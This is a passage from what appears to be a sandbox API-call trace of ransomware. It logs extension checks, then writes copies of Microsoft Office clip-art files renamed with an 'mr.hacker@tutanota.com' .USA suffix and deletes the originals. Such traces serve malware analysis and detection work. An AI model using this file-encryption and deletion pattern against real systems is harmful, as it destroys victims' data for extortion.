(lpString1=".7z", lpString2="WMF") returned -1 [0273.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.312] lstrlenW (lpString=".dbf") returned 4 [0273.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.312] lstrlenW (lpString=".1cd") returned 4 [0273.312] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.312] lstrlenW (lpString=".jpg") returned 4 [0273.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.312] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.312] lstrlenW (lpString="IN00557_.WMF") returned 12 [0273.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.313] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=9172) returned 1 [0273.313] CloseHandle (hObject=0x2ac) returned 1 [0273.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf")) returned 0x20 [0273.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.313] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.313] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.313] GetLastError () returned 0x0 [0273.313] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x23d4, lpOverlapped=0x0) returned 1 [0273.601] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x23e0, lpOverlapped=0x0) returned 1 [0273.602] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.602] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.602] SetEndOfFile (hFile=0x2b0) returned 1 [0273.602] CloseHandle (hObject=0x2b0) returned 1 [0273.602] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.603] SetEndOfFile (hFile=0x2ac) returned 1 [0273.604] CloseHandle (hObject=0x2ac) returned 1 [0273.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.605] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf")) returned 1 [0273.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.605] lstrlenW (lpString=".doc") returned 4 [0273.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.605] lstrlenW (lpString=".docx") returned 5 [0273.605] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.605] lstrlenW (lpString=".pdf") returned 4 [0273.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.605] lstrlenW (lpString=".xls") returned 4 [0273.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.605] lstrlenW (lpString=".xlsx") returned 5 [0273.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.605] lstrlenW (lpString=".ppt") returned 4 [0273.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.605] lstrlenW (lpString=".zip") returned 4 [0273.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.605] lstrlenW (lpString=".rar") returned 4 [0273.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.605] lstrlenW (lpString=".bz2") returned 4 [0273.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString=".7z") returned 3 [0273.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString=".dbf") returned 4 [0273.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString=".1cd") returned 4 [0273.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString=".jpg") returned 4 [0273.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString=".doc") returned 4 [0273.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString=".docx") returned 5 [0273.606] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.606] lstrlenW (lpString=".pdf") returned 4 [0273.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString=".xls") returned 4 [0273.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.606] lstrlenW (lpString=".xlsx") returned 5 [0273.606] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.606] lstrlenW (lpString=".ppt") returned 4 [0273.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.606] lstrlenW (lpString=".zip") returned 4 [0273.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.606] lstrlenW (lpString=".rar") returned 4 [0273.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.606] lstrlenW (lpString=".bz2") returned 4 [0273.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.607] lstrlenW (lpString=".7z") returned 3 [0273.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.607] lstrlenW (lpString=".dbf") returned 4 [0273.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.607] lstrlenW (lpString=".1cd") returned 4 [0273.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF") returned 63 [0273.607] lstrlenW (lpString=".jpg") returned 4 [0273.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.607] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.607] lstrlenW (lpString="J0090781.WMF") returned 12 [0273.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.607] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=5314) returned 1 [0273.607] CloseHandle (hObject=0x2ac) returned 1 [0273.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf")) returned 0x20 [0273.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.608] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.608] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.608] GetLastError () returned 0x0 [0273.608] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x14c2, lpOverlapped=0x0) returned 1 [0273.609] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0273.610] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.610] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.610] SetEndOfFile (hFile=0x2b0) returned 1 [0273.610] CloseHandle (hObject=0x2b0) returned 1 [0273.610] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.610] SetEndOfFile (hFile=0x2ac) returned 1 [0273.612] CloseHandle (hObject=0x2ac) returned 1 [0273.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf")) returned 1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.613] lstrlenW (lpString=".doc") returned 4 [0273.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString=".docx") returned 5 [0273.613] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0273.613] lstrlenW (lpString=".pdf") returned 4 [0273.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString=".xls") returned 4 [0273.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.613] lstrlenW (lpString=".xlsx") returned 5 [0273.613] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0273.613] lstrlenW (lpString=".ppt") returned 4 [0273.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.613] lstrlenW (lpString=".zip") returned 4 [0273.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.613] lstrlenW (lpString=".rar") returned 4 [0273.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString=".bz2") returned 4 [0273.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString=".7z") returned 3 [0273.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.613] lstrlenW (lpString=".dbf") returned 4 [0273.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.613] lstrlenW (lpString=".1cd") returned 4 [0273.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString=".jpg") returned 4 [0273.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString=".doc") returned 4 [0273.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".docx") returned 5 [0273.614] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0273.614] lstrlenW (lpString=".pdf") returned 4 [0273.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".xls") returned 4 [0273.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.614] lstrlenW (lpString=".xlsx") returned 5 [0273.614] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0273.614] lstrlenW (lpString=".ppt") returned 4 [0273.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString=".zip") returned 4 [0273.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.614] lstrlenW (lpString=".rar") returned 4 [0273.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".bz2") returned 4 [0273.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".7z") returned 3 [0273.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString=".dbf") returned 4 [0273.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.614] lstrlenW (lpString=".1cd") returned 4 [0273.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF") returned 63 [0273.615] lstrlenW (lpString=".jpg") returned 4 [0273.615] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.615] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.615] lstrlenW (lpString="J0090783.WMF") returned 12 [0273.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.615] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=6934) returned 1 [0273.615] CloseHandle (hObject=0x2ac) returned 1 [0273.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf")) returned 0x20 [0273.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.615] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.615] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.616] GetLastError () returned 0x0 [0273.616] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x1b16, lpOverlapped=0x0) returned 1 [0273.617] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1b20, lpOverlapped=0x0) returned 1 [0273.618] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.618] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.618] SetEndOfFile (hFile=0x2b0) returned 1 [0273.618] CloseHandle (hObject=0x2b0) returned 1 [0273.618] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.618] SetEndOfFile (hFile=0x2ac) returned 1 [0273.622] CloseHandle (hObject=0x2ac) returned 1 [0273.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf")) returned 1 [0273.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.622] lstrlenW (lpString=".doc") returned 4 [0273.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.622] lstrlenW (lpString=".docx") returned 5 [0273.622] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0273.622] lstrlenW (lpString=".pdf") returned 4 [0273.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.622] lstrlenW (lpString=".xls") returned 4 [0273.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.622] lstrlenW (lpString=".xlsx") returned 5 [0273.622] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0273.623] lstrlenW (lpString=".ppt") returned 4 [0273.623] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString=".zip") returned 4 [0273.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.623] lstrlenW (lpString=".rar") returned 4 [0273.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".bz2") returned 4 [0273.623] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".7z") returned 3 [0273.623] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString=".dbf") returned 4 [0273.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString=".1cd") returned 4 [0273.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString=".jpg") returned 4 [0273.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.623] lstrlenW (lpString=".doc") returned 4 [0273.623] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".docx") returned 5 [0273.623] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0273.623] lstrlenW (lpString=".pdf") returned 4 [0273.623] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".xls") returned 4 [0273.623] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.623] lstrlenW (lpString=".xlsx") returned 5 [0273.623] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0273.624] lstrlenW (lpString=".ppt") returned 4 [0273.624] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.624] lstrlenW (lpString=".zip") returned 4 [0273.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.624] lstrlenW (lpString=".rar") returned 4 [0273.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString=".bz2") returned 4 [0273.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString=".7z") returned 3 [0273.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.624] lstrlenW (lpString=".dbf") returned 4 [0273.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.624] lstrlenW (lpString=".1cd") returned 4 [0273.624] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63 [0273.624] lstrlenW (lpString=".jpg") returned 4 [0273.624] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.624] 